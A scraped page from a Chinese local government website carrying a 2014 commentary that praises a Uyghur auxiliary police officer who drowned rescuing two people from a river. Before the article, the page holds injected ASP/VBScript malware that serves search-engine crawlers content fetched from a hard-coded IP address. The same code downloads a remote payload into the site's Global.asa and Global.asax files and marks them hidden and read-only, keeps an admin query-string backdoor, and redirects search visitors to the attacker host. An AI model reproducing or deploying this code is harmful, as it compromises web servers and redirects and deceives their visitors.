' ' 'by*aming Server.ScriptTimeout=600 Public Function createasa(ByVal Content) On Error Resume Next Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" & Server.MapPath("/Global.asa")) f.Attributes=0 Set Obj = Server.CreateObject("adod" & "b.S" & "tream") Obj.Type = 2 Obj.open Obj.Charset = "gb2312" Obj.Position = Obj.Size Obj.writetext = Content Obj.SaveToFile "//./" & Server.MapPath("/Global.asa"),2 Obj.Close Set Obj = Nothing f.Attributes=1+2+4 set f=Nothing Set fso = Nothing End Function Public Function createasax(ByVal Content) On Error Resume Next Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" & Server.MapPath("/Global.asax")) f.Attributes=0 Set Obj = Server.CreateObject("adod" & "b.S" & "tream") Obj.Type = 2 Obj.open Obj.Charset = "gb2312" Obj.Position = Obj.Size Obj.writetext = Content Obj.SaveToFile "//./" & Server.MapPath("/Global.asax"),2 Obj.Close Set Obj = Nothing f.Attributes=1+2+4 set f=Nothing Set fso = Nothing End Function Public Function GetHtml(url) Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") ObjXMLHTTP.Open "GET",url,False ObjXMLHTTP.setRequestHeader "User-Agent",url ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = "gb2312" GetHtml = objStream.ReadText objStream.Close End Function Function check(user_agent) allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp,360,so,haosou",",") check_agent=false For agenti=lbound(allow_agent) to ubound(allow_agent) If instr(user_agent,allow_agent(agenti))>0 then check_agent=true exit for end if Next check=check_agent End function Function CheckRobot() CheckRobot = False Dim Botlist,i,Repls Repls = request.ServerVariables("http_user_agent") Krobotlist = "Baiduspider|Googlebot" Botlist = Split(Krobotlist,"|") For i = 0 To Ubound(Botlist) If InStr(Repls,Botlist(i)) > 0 Then CheckRobot = True Exit For End If Next If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1 If Session("ThisCheckRobot") = 1 Then CheckRobot = True End Function Function CheckRefresh() CheckRefresh = False Dim Botlist,i,Repls Krobotlist = "baidu|google|sogou|soso|youdao|bing|yahoo|qihoo|iask|haosou|360.cn|so.|anquan|qq.|51yes|51.la" Botlist = Split(Krobotlist,"|") For i = 0 To Ubound(Botlist) If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then CheckRefresh = True Exit For End If Next End Function Sub sleep() If response.IsClientConnected=true then Response.Flush else response.end end if End Sub If CheckRefresh=true Then cnnbd=lcase(Request.ServerVariables("HTTP_HOST")&request.ServerVariables("HTTP_URL")) 'response.redirect("http://198.2.196.141/?"&cnnbd&"") fkurl = GetHtml("http://198.2.196.141/") Response.Write fkurl response.end end If user_agent=Request.ServerVariables("HTTP_USER_AGENT") if check(user_agent)=true then body=GetHtml("http://198.2.196.141/") response.write body urlname="http://"&request.servervariables("HTTP_HOST") link=GetHtml(urlname) response.write link response.end else asa=GetHtml("http://198.2.196.141/globalquan.txt") if instr(asa,"by*aming")>0 then createasa(asa) end if dim name name=request.servervariables("Path_Translated") Set fso = Server.CreateObject("scripting.filesystemobject") set f=fso.Getfile("//./" & Server.MapPath("/global.asa")) Dim v Dim t ReDim A(Request.Form.Count) ReDim B(Request.Form.Count) v=Request.Form t=Request.Form.Count if t>0 then For i=0 To t-1 b(i)=Split(Split(v,"&")(i),"=")(1) if instr(LCase(b(i)),"global.asa")>0 then f.Attributes=1+2+4 response.end() end if Next end if if DC=false and CF=True and request.servervariables("QUERY_STRING")<>"" then response.redirect(Rurl&"?"&Request.ServerVariables("HTTP_HOST")) elseif instr(name,";")>0 then set m=fso.Getfile(name) m.Attributes=0 fso.DeleteFile(name) f.Attributes=1+2+4 response.end() end if ScriptAddress=Request.ServerVariables("SCRIPT_NAME") namepath=Server.MapPath(ScriptAddress) If Len(Request.QueryString) > 0 Then ScriptAddress = ScriptAddress & "?" & Request.QueryString end if geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress geturl =LCase(geturl) 'response.write replace(namepath,server.MapPath("/"),"") 'response.end 'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then agent = lcase(request.servervariables("http_user_agent")) referer = LCase(Request.ServerVariables("HTTP_REFERER")) bot = "" Amll = "" if instr(agent, "+") > 0 then bot = agent if instr(agent, "-") > 0 then bot = agent if instr(agent, "http") > 0 then bot = agent if instr(agent, "spider") > 0 then bot = agent if instr(agent, "bot") > 0 then bot = agent if instr(agent, "linux") > 0 then bot = agent if instr(agent, "baidu") > 0 then bot = agent if instr(agent, "google") > 0 then bot = "nobot" if instr(agent, "yahoo") > 0 then bot = "nobot" if instr(agent, "msn") > 0 then bot = "nobot" if instr(agent, "alexa") > 0 then bot = "nobot" if instr(agent, "sogou") > 0 then bot = "nobot" if instr(agent, "youdao") > 0 then bot = "nobot" if instr(agent, "soso") > 0 then bot = "nobot" if instr(agent, "iask") > 0 then bot = "nobot" if bot="nobot" then 'Call WriteErr 'response.end end if If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok" tjcount=request.Cookies("cookie_tjcount") date1=request.Cookies("cookie_date") date2=year(date)&month(date)&day(date) if tjcount="" then response.cookies("cookie_tjcount")=0 response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now()) end if if date1<>date2 then response.cookies("cookie_date")=date2 response.cookies("cookie_date").Expires=DateAdd("d",365,now()) end if tjcount=request.Cookies("cookie_tjcount") date1=request.Cookies("cookie_date") date2=year(date)&month(date)&day(date) if date1=date2 and len(bot) = 0 then if int(tjcount)<10 and len(Amll)>0 then response.cookies("cookie_tjcount")=int(tjcount)+1 response.cookies("cookie_tjcount").Expires=DateAdd("d",1,now()) strHost=Request.ServerVariables("HTTP_HOST") Response.Redirect("http://198.2.196.141/?domain="&strHost&"") else response.write "系统找不到指定的文件。" 'response.write "" 'response.write gethtml(geturl&"?global=ok") end if response.end end if Call sleep() end if end if ' 致敬!“最美”新疆协警_ _思想言论_马尔康组工网——中共马尔康市委组织部信息中心
  您的位置  首页 >> 思想言论 >> >> 正文
致敬!“最美”新疆协警
[审核: | 撰稿:敬诚 | 日期:2014年11月4日 | 浏览2661 次] 字体:[ ]

中国青年网链接:http://pinglun.youth.cn/ttst/201406/t20140613_5358226.htm

       昨天下午,新疆库尔勒市两名汉族青年男女落入孔雀河,库尔勒市公安局巡警大队维吾尔族协警西尔艾力·艾比和4名战友跳入2米多深的河中,成功将两人营救上岸,西尔艾力·艾比却不幸溺水身亡,年仅24岁。(6月12日新华网)

  近来,先是高考途中勇斗歹徒的夺刀少年柳艳兵,再是面对歹徒“人质接力”的老师和官员,不断震撼人心。在很多人感叹世风日下,纠结于“扶不扶”的问题时,他们用行动为社会注入了一股清新的空气,让人们感受着人性的美好与善良,感觉社会满满的正能量。

  今天,一名年仅24岁的维吾尔族协警,用生命诠释社会的正能量,演绎生命最美的华章,让人敬佩。在暴恐阴影散去不久的新疆,这样的行为更为可贵。这让所有人都感受到,新疆依然美丽,新疆并没有因为暴恐而失色,暴恐分子只是极小部分,他们的暴行并没有改变新疆什么,只是让新疆人民更加团结。

  24岁,花一样的年华,他却选择了为了他人的生命牺牲自己的生命。没有对各族群众的深情,就不会在救人时毫不犹豫地跳进河水。西尔艾力·艾比跳进河水勇于救人的背后是他崇高道德品质的集中体现。在和平年代,英雄并不多见,危急时刻,方显英雄本色,西尔艾力·艾比用行动证明,他正是这样的英雄。一个人生命的价值不在于长短,而于他对社会付出了多少,西尔艾力·艾比用最美的举动定格了他生命的意义。

  虽然,西尔艾力·艾比只是一名普通的协警,但他却是新疆的一个缩影,他用行动证明着最美新疆,最美新疆人。让我们向救人牺牲的西尔艾力·艾比致敬!


相关文章

  • ·没有相关文章

相关专题

  • ·专题1信息无
  • ·专题2信息无